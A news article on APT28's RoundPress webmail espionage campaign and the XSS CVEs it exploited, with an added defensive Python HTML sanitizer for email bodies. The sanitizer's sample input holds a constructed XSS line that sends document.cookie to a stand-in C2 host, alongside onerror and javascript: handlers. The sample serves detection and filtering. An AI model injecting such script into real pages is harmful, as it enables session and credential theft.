Russian hackers accused of global government email breach
Farah Amod
Jun 6, 2025 5:51:58 AM

Russian state-backed hackers used silent, email-based exploits to breach global government inboxes in a stealthy campaign now linked to APT28.
What happened
A newly uncovered cyberespionage operation called RoundPress has been attributed to the Russian state-sponsored hacking group APT28, also known as Fancy Bear. According to cybersecurity firm ESET, the campaign began in 2023 and extended through 2024, exploiting vulnerabilities in widely used webmail platforms to infiltrate the inboxes of government agencies and defense organizations across the globe.
Using both zero-day and known cross-site scripting (XSS) flaws, the hackers targeted platforms such as Roundcube, Horde, MDaemon, and Zimbra. Victims included government entities in Greece, Ukraine, Serbia, and Cameroon, along with military and critical infrastructure targets in Europe and South America.
Going deeper
The attack method was deceptively simple: victims received spear-phishing emails referencing current events. Embedded in these emails was malicious JavaScript that executed automatically as soon as the email was opened, with no clicks or downloads required. The script exploited XSS vulnerabilities to steal credentials and sensitive data.
The payload harvested login details by triggering browser autofill functions, then scraped content from the victim’s inbox and settings. Stolen data, including two-factor authentication settings and password histories, was quietly exfiltrated to hardcoded command-and-control (C2) servers. Each variation of the attack script was tailored to the specific webmail software in use.
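A defensive illustration of the content filtering that blocks this class of attack, added here and not taken from ESET's report or any webmail project: an allowlist HTML sanitizer (Python standard library only) that drops script elements, event-handler attributes and javascript: links before a message body is rendered, and records what it removed so the findings can feed detection. The sample message body is constructed for the example.

```python
# Added defensive example (not ESET's or any webmail project's code): allowlist sanitizer for message bodies.
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "u", "a", "ul", "ol", "li", "div"}
ALLOWED_ATTRS = {"a": {"href"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "form"}

class EmailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out, self.findings, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:              # element and its content vanish
            self.findings.append(f"dropped <{tag}>")
            self._skip += 1
        if self._skip:
            return
        kept = []
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on"):             # onload=, onerror=, ... fire on render
                self.findings.append(f"removed {name} on <{tag}>")
            elif name == "href" and not value.lower().startswith(SAFE_SCHEMES):
                self.findings.append(f"removed unsafe href on <{tag}>")
            elif name in ALLOWED_ATTRS.get(tag, ()):
                kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag in ALLOWED_TAGS:                   # unknown tags are dropped, their text kept
            self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data))         # text is re-escaped, never emitted raw

def sanitize_email_html(raw):
    # Returns (safe_html, findings) for an untrusted message body.
    p = EmailSanitizer()
    p.feed(raw)
    p.close()
    return "".join(p.out), p.findings
# Constructed sample modelled on the technique in the article, not a real payload.
SAMPLE = ('<p>Update on <b>current events</b></p><script>fetch("https://c2.example/?"+document.cookie)'
          '</script><img src=x onerror="steal()"><a href="javascript:steal()">Read more</a>')
```

The findings list is what a mail gateway or webmail frontend would log and alert on, since a message carrying script or event handlers is itself an indicator of this technique.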
In the know
Vulnerabilities exploited included:
- Roundcube: CVE-2020-35730 and CVE-2023-43770 used to inject JavaScript into email content, triggered on open.
- MDaemon: CVE-2024-11182, a zero-day flaw that allowed credential theft and potential 2FA bypass.
- Zimbra: CVE-2024-27443 was exploited through a calendar invite vulnerability that enabled base64-encoded JavaScript execution.
- Horde: an older, unconfirmed flaw that attackers attempted but failed to exploit, likely due to recent patches.
Though there were no confirmed RoundPress incidents in 2025, ESET warns that similar methods remain viable due to the steady discovery of new XSS flaws in common webmail tools.
What was said
ESET researchers stated that the campaign could continue with minimal adjustments, noting: “As long as email remains a reliable attack vector and webmail clients contain exploitable flaws, campaigns like RoundPress are likely to persist.”
The group behind the campaign, APT28, is already sanctioned by the U.S. and European governments for past cyberespionage efforts, including interference in democratic elections and NATO-related targeting.
The big picture
RoundPress shows a growing cybersecurity risk: attacks that require no user interaction beyond opening an email. As organizations rely on browser-based communications, the threat of silent, automated credential theft becomes more severe. Governments and infrastructure providers remain top targets for state-sponsored hackers, particularly in times of geopolitical tension.
The campaign underscores the need for timely patching, zero-trust access models, and the retirement of legacy webmail platforms vulnerable to XSS attacks.
FAQs
Who is APT28, and why are they significant?
APT28, also known as Fancy Bear, is a Russian military-linked hacking group known for high-profile cyberespionage campaigns, including election interference and attacks on NATO entities.
Why are webmail platforms frequent targets for cyberattacks?
Webmail platforms often contain unpatched vulnerabilities and are widely used in government and enterprise settings, making them attractive entry points for attackers seeking sensitive data.
What makes spear-phishing via email so effective in these attacks?
Spear-phishing emails can bypass user suspicion when tailored with current events, and in cases like RoundPress, no interaction beyond opening the email is needed to trigger the exploit.
What are XSS vulnerabilities, and how do hackers exploit them?
Cross-site scripting (XSS) flaws let attackers inject malicious scripts into trusted web apps. Hackers use XSS to execute JavaScript inside emails and steal login credentials.
What can organizations do to reduce exposure to these threats?
Steps include retiring outdated webmail software, applying patches promptly, using email content filters, and enforcing zero-trust security models across all user endpoints.